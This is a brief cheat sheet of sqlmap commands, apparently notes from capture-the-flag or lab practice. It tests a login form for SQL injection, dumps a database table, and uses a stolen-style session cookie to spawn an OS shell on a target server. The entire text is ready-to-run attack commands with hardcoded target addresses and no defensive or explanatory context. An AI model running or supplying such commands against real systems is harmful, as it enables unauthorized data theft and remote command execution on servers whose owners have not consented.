# SQLmap
# 
# check username and password for sql injection using POST method for DBMS of type MySQL.
sqlmap -u "http://35.227.24.107/a0218d304a/login" --method=POST --batch  --dbms=mysql --data ="username=aaa&password=bbbb&form=submit" -p "username,password"

# dump table PAGES, from database LEVEL2, by exploiting sql injection in password or username parameter.
sqlmap -u "http://35.227.24.107/a0218d304a/login" --method=POST  --dbms=mysql --data="username=aaa&password=bbbb&form=submit" -p "password,username" -D "level2" -T "pages" --dump

# use of cookie session and spawn a shell using sqlmap 
sqlmap -u "http://10.10.10.46/dashboard.php" --data="search=aaaa&form=submit" -p "search" --cookie="PHPSESSID=0648ghe9hu8gvjp0fa58pev9j0" --os-shell --flush
